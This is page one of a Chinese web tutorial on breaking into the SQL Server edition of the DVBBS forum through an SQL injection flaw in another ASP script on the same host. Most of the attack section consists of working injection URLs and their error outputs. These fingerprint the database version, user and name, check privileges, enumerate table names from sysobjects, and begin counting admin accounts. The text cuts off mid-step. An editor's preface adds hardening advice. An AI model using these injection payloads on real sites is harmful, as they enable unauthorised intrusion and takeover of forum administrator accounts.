转至繁体中文版     | 网站首页 | 图文教程 | 资源下载 | 站长博客 | 图片素材 | 武汉seo | 武汉网站优化 | 
最新公告:     敏韬网|教学资源学习资料永久免费分享站!  [mintao  2008年9月2日]        
您现在的位置: 学习笔记 >> 图文教程 >> 数据库 >> Sql Server >> 正文
再谈SQL注入入侵动网SQL版         

再谈SQL注入入侵动网SQL版

作者:闵涛 文章来源:闵涛的学习笔记 点击数:2306 更新时间:2007/11/14 12:58:05
编辑前言:
  这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是SA帐号,就更是麻烦了。

  正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多理想状态下的入侵行为,在编程中减少安全漏洞是我们每个程序员要注意的。而站长在组合使用多个程序的时候,也要注意安全和程序的完整性。

  在我所了解的多个动网7.0+sp2 的版本也有2-3次被黑现象,所以大家还要及时注意升级,详细进行权限设置。并不是说动网不好,而是说他程序的开放性,用的人很多,找出来的BUG会很多,软件学里说了,用的越多,BUG会越多。相对来说,我喜欢自己定制化开发的程序,相对来说会安全一些。

下面是六中男孩的正文

  现在动网最新版本是7.0+SP2。应该说安全性已经是很高的了。所以从脚本本身的问题去突破它难度不小。但是我们可以从外部的一些途径间接“搞定”动网.现在IIS+ASP+SQL2000的组合是比较常见的。而一个网站运用大量的ASP脚本程序,难免不出纰漏。如果一台主机上存在某个SQL注入点,而这台主机又安装有动网SQL版的话,基本上可以得出结论:这个动网就是你的了。下面来看一下实例。

  一、 首先确定目标。假设以下URL存在SQL注入:
 程序代码: [ 复制代码到剪贴板 ] http://www.loveyou.com/type.asp?id=6 测试能否注入可以在6后面加个单引号。

http://www.loveyou.com/type.aspid=6'''' 返回错误提示:
 Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e14'''' 
[ Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '''''''' 之前有未闭合的引号。

  继续,先探测一下系统版本:
 程序代码: [ 复制代码到剪贴板 ] http://www.loveyou.com/type.asp?id=(select @@version)-- 

返回:  Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07'''' 
[ Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 '''' Microsoft SQL Server 2000 - 8.00.760 ( Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003  Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '''' 转换为数据类型为 int 的列时发生语法错误。 
看来已经打上最新的SP4补丁。

  取得当前连接数据库用户:
 程序代码: [ 复制代码到剪贴板 ] http://www.loveyou.com/type.asp?id=(select user_name())-- 

返回: Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07'''' 
[ Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 ''''webuser'''' 转换为数据类型为 int 的列时发生语法错误。
从错误信息中得到当前数据库用户为:webuser

  取得当前连接数据库名:
 程序代码: [ 复制代码到剪贴板 ] http://www.loveyou.com/type.asp?id=(select db_name())--

返回: Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07'''' 
[ Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 ''''01city'''' 转换为数据类型为 int 的列时发生语法错误。 
从错误信息中得到当前数据库名为: 01city

  接下来测试下权限:(注:因为我们的目的是搞定动网而不是侵占系统。所以数据库权限对我们不是很重要。)
 程序代码: [ 复制代码到剪贴板 ] http://www.loveyou.com/type.asp?id=(SELECT IS_SRVROLEMEMBER(''''sysadmin''''))--
返回错误信息。提示当前记录已删除。看来权限果然不是很高耶。继续,
http://www.loveyou.com/type.asp?id=(SE ... (''''db_owner''''))--
正常显示信息,看来连接数据库拥有的权限是DB_OWNER(DOWN数据库所有者。但对操纵数据是绰绰有余了。

  二.得到数据库表名。不出意外的话动网的各个表就存在于当前数据库01city中。
  首先得到第一个表:
 程序代码: [ 复制代码到剪贴板 ] http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype=''''u'''' and status>0 and name not in(''''''''))--
返回:[ Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 ''''address'''' 转换为数据类型为 int 的列时发生语法错误。 
好的,第一个表名出来了,为: address
继续,
0 and name not in(''''address''''))--" target=_blank>http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects whe ... us>0 and name not in(''''address''''))--
返回: admin 第二个表名也出来了。依次类推, 提交:
0 and name not in(''''address''''" target=_blank>http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects w ... tatus>0 and name not in(''''address'''',''''admin'''',...))--

  可以得到当前数据库中所有表名。
  不一会儿,结果出来了, 表名好眼熟啊。
"address","admin","bbslink","bbsnews","board","user".........傻瓜都看的出这是动网的表。当然还有其它的一些表,我们不去管它。
  接下来就好办了,也不要去猜字段了,我们打开自己的动网数据库看一下就知道了。 既然有了表名,字段名,那么,动网不就在你掌握之下了吗? 但千万不要 drop table啊。 破坏就不好了。我们的目的是演练技术,提高水平。 好,那么,我们去得到动网的后台。

  三、进入后台,取得动网论坛管理员权限。
 程序代码: [ 复制代码到剪贴板 ] 先看看后台有多少个管理员:
http://www.loveyou.com/type.asp?id=6 and 4 ... sername) from admin)--
返回错误: 当前的记录已被删除。说明管理员少于4位。直接提交,
http://www.loveyou.com/type.asp?id=6 and 1 ... sername) from admin)--
正常显示信息,看来管理员只有一个,读出管理员名字,
http://www.loveyou.com

[1] [2]  下一页


[办公软件]在sybase中插入图片、PDF、文本文件  [办公软件]安装Sybase ASE
[办公软件]linux指令大全(完整篇)  [办公软件]Linux新手入门常用命令大全
[办公软件]在RedHat Linux 9里安装gaim0.80  [办公软件]浅谈Linux 下Java 1.5 汉字方块问题解决方法
[办公软件]Linux程序员必读:中文化与GB18030标准  [办公软件]linux指令大全
[办公软件]制作Linux启动盘的四种方法  [办公软件]Linux文件系统的反删除方法
教程录入:mintao    责任编辑:mintao 
  • 上一篇教程:

  • 下一篇教程:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      注:本站部分文章源于互联网,版权归原作者所有!如有侵权,请原作者与本站联系,本站将立即删除! 本站文章除特别注明外均可转载,但需注明出处! [MinTao学以致用网]
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    同类栏目
    · Sql Server  · MySql
    · Access  · ORACLE
    · SyBase  · 其他
    更多内容
    热门推荐 更多内容
  • 没有教程
    		•
    赞助链接
    更多内容
    闵涛博文 更多关于武汉SEO的内容
    500 - 内部服务器错误。

    500 - 内部服务器错误。

    您查找的资源存在问题,因而无法显示。
    | 设为首页 |加入收藏 | 联系站长 | 友情链接 | 版权申明 | 广告服务
    MinTao学以致用网

    Copyright @ 2007-2012 敏韬网(敏而好学,文韬武略--MinTao.Net)(学习笔记) Inc All Rights Reserved.
    闵涛 投放广告、内容合作请Q我! E_mail:admin@mintao.net(欢迎提供学习资源)

    站长:MinTao ICP备案号:鄂ICP备11006601号-18

    闵涛站盟:医药大全-武穴网A打造BCD……
    		咸宁网络警察报警平台